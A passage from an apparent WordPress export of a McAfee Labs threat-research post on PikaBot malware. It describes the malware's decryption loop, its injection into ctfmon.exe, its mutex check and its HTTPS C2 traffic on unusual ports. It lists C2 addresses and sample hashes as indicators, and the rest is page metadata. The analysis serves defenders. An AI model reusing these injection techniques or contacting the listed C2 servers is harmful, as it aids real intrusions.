https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-21-285x300.png 285w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-21-123x129.png 123w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-21-24x24.png 24w\" sizes=\"auto, (max-width: 476px) 100vw, 476px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 21. Decryption Loop<\/strong><\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187994 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-23.png\" alt=\"\" width=\"475\" height=\"208\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-23.png 475w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-23-300x131.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-23-205x90.png 205w\" sizes=\"auto, (max-width: 475px) 100vw, 475px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 22. Decrypted to get the PE file<\/strong><\/span><\/p>\n<h2><span style=\"color: #000000;\">Core Module:<\/span><\/h2>\n<p><span style=\"color: #000000;\">Once the data is decrypted, it proceeds to jump to the entry point of the new PE file. When this PE file gets executed, it injects the malicious content in ctfmon.exe with the command line argument &#8220;C:\\Windows\\SysWOW64\\ctfmon.exe -p 1234\u201d<\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-188009 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-23-1.png\" alt=\"\" width=\"475\" height=\"208\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-23-1.png 475w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-23-1-300x131.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-23-1-205x90.png 205w\" sizes=\"auto, (max-width: 475px) 100vw, 475px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 23. Injection with ctfmon.exe<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">To prevent double infection, it employs a hardcoded mutex value {9ED9ADD7-B212-43E5-ACE9-B2E05ED5D524} by calling CreateMutexW(), followed by a call to GetLastError() to check the last error code.<\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-188024 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-24.png\" alt=\"\" width=\"531\" height=\"253\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-24.png 531w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-24-300x143.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-24-205x98.png 205w\" sizes=\"auto, (max-width: 531px) 100vw, 531px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 24. Mutex<\/strong><\/span><\/p>\n<h2><span style=\"color: #000000;\">Network communication:<\/span><\/h2>\n<p><span style=\"color: #000000;\">Malware collects the data from the victim machine and sends it to the C2 server.<\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-188039 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-25.png\" alt=\"\" width=\"564\" height=\"205\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-25.png 564w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-25-300x109.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-25-205x75.png 205w\" sizes=\"auto, (max-width: 564px) 100vw, 564px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 25. Network activity<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">PIKABOT performs network communication over HTTPS on non-traditional ports (2221, 2078, etc).<\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-188054 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-26.png\" alt=\"\" width=\"606\" height=\"356\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-26.png 606w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-26-300x176.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-26-205x120.png 205w\" sizes=\"auto, (max-width: 606px) 100vw, 606px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 26. Network activity<\/strong><\/span><\/p>\n<h2><span style=\"color: #000000;\">C2 server communication:<\/span><\/h2>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-188069 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-27.png\" alt=\"\" width=\"745\" height=\"294\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-27.png 745w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-27-300x118.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-27-205x81.png 205w\" sizes=\"auto, (max-width: 745px) 100vw, 745px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 27. C2 communication<\/strong><\/span><\/p>\n<h1><span style=\"color: #000000;\">IOCs:<\/span><\/h1>\n<p><span style=\"color: #000000;\">C2 found in the payload are:<\/span><\/p>\n<p><span style=\"color: #000000;\">178.18.246.136:2078<\/span><\/p>\n<p><span style=\"color: #000000;\">86.38.225.106:2221<\/span><\/p>\n<p><span style=\"color: #000000;\">57.128.165.176:1372<\/span><\/p>\n<table width=\"865\">\n<tbody>\n<tr>\n<td width=\"95\"><span style=\"color: #000000;\"><strong>File Type<\/strong><\/span><\/td>\n<td width=\"770\"><span style=\"color: #000000;\"><strong>SHA 256<\/strong><\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"95\"><span style=\"color: #000000;\">ZIP<\/span><\/td>\n<td width=\"770\"><span style=\"color: #000000;\">800fa26f895d65041ddf12c421b73eea7f452d32753f4972b05e6b12821c863a<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"95\"><span style=\"color: #000000;\">HTML<\/span><\/td>\n<td width=\"770\"><span style=\"color: #000000;\">9fc72bdf215a1ff8c22354aac4ad3c19b98a115e448cb60e1b9d3948af580c82<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"95\"><span style=\"color: #000000;\">ZIP<\/span><\/td>\n<td width=\"770\"><span style=\"color: #000000;\">4c29552b5fcd20e5ed8ec72dd345f2ea573e65412b65c99d897761d97c35ebfd<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"95\"><span style=\"color: #000000;\">JS<\/span><\/td>\n<td width=\"770\"><span style=\"color: #000000;\">9a4b89276c65d7f17c9568db5e5744ed94244be7ab222bedd8b64f25695ef849<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"95\"><span style=\"color: #000000;\">EXE<\/span><\/td>\n<td width=\"770\"><span style=\"color: #000000;\">89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"95\"><span style=\"color: #000000;\">ZIP<\/span><\/td>\n<td width=\"770\"><span style=\"color: #000000;\">f3f1492d65b8422125846728b320681baa05a6928fbbd25b16fa28b352b1b512<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"95\"><span style=\"color: #000000;\">EXE<\/span><\/td>\n<td width=\"770\"><span style=\"color: #000000;\">aab0e74b9c6f1326d7ecea9a0de137c76d52914103763ac6751940693f26cbb1<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"95\"><span style=\"color: #000000;\">XLSX<\/span><\/td>\n<td width=\"770\"><span style=\"color: #000000;\">bcd3321b03c2cba73bddca46c8a509096083e428b81e88ed90b0b7d4bd3ba4f5<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"95\"><span style=\"color: #000000;\">JS<\/span><\/td>\n<td width=\"770\"><span style=\"color: #000000;\">49d8fb17458ca0e9eaff8e3b9f059a9f9cf474cc89190ba42ff4f1e683e09b72<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"95\"><span style=\"color: #000000;\">ZIP<\/span><\/td>\n<td width=\"770\"><span style=\"color: #000000;\">d4bc0db353dd0051792dd1bfd5a286d3f40d735e21554802978a97599205bd04<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"95\"><span style=\"color: #000000;\">JAR<\/span><\/td>\n<td width=\"770\"><span style=\"color: #000000;\">d26ab01b293b2d439a20d1dffc02a5c9f2523446d811192836e26d370a34d1b4<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"95\"><span style=\"color: #000000;\">DLL<\/span><\/td>\n<td width=\"770\"><span style=\"color: #000000;\">7b1c5147c903892f8888f91c98097c89e419ddcc89958a33e294e6dd192b6d4e<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"color: #000000;\"><strong>\u00a0<\/strong><\/span><\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Authored by Anuradha and Preksha Introduction PikaBot is a malicious backdoor that has been active since early 2023. Its modular&#8230;<\/p>\n","protected":false},"author":695,"featured_media":188086,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[],"coauthors":[4136],"class_list":["post-187631","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Distinctive Campaign Evolution of Pikabot Malware | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Authored by Anuradha and Preksha Introduction PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Distinctive Campaign Evolution of Pikabot Malware | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Authored by Anuradha and Preksha Introduction PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2024-04-02T18:12:55+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-04-02T18:22:11+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"McAfee Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee_Labs\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee Labs\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/\"},\"author\":{\"name\":\"McAfee Labs\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\"},\"headline\":\"Distinctive Campaign Evolution of Pikabot Malware\",\"datePublished\":\"2024-04-02T18:12:55+00:00\",\"dateModified\":\"2024-04-02T18:22:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/\"},\"wordCount\":1644,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png\",\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/\",\"name\":\"Distinctive Campaign Evolution of Pikabot Malware | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png\",\"datePublished\":\"2024-04-02T18:12:55+00:00\",\"dateModified\":\"2024-04-02T18:22:11+00:00\",\"description\":\"Authored by Anuradha and Preksha Introduction PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png\",\"width\":300,\"height\":200},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Distinctive Campaign Evolution of Pikabot Malware\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\",\"name\":\"McAfee Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"caption\":\"McAfee Labs\"},\"description\":\"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee_Labs\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Distinctive Campaign Evolution of Pikabot Malware | McAfee Blog","description":"Authored by Anuradha and Preksha Introduction PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Distinctive Campaign Evolution of Pikabot Malware | McAfee Blog","og_description":"Authored by Anuradha and Preksha Introduction PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2024-04-02T18:12:55+00:00","article_modified_time":"2024-04-02T18:22:11+00:00","og_image":[{"width":300,"height":200,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png","type":"image\/png"}],"author":"McAfee Labs","twitter_card":"summary_large_image","twitter_creator":"@McAfee_Labs","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee Labs","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/"},"author":{"name":"McAfee Labs","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad"},"headline":"Distinctive Campaign Evolution of Pikabot Malware","datePublished":"2024-04-02T18:12:55+00:00","dateModified":"2024-04-02T18:22:11+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/"},"wordCount":1644,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png","articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/","name":"Distinctive Campaign Evolution of Pikabot Malware | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png","datePublished":"2024-04-02T18:12:55+00:00","dateModified":"2024-04-02T18:22:11+00:00","description":"Authored by Anuradha and Preksha Introduction PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png","width":300,"height":200},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Distinctive Campaign Evolution of Pikabot Malware"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad","name":"McAfee Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","caption":"McAfee Labs"},"description":"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.","sameAs":["https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee_Labs"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/187631","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/695"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=187631"}],"version-history":[{"count":9,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/187631\/revisions"}],"predecessor-version":[{"id":188150,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/187631\/revisions\/188150"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/188086"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=187631"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=187631"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=187631"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=187631"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}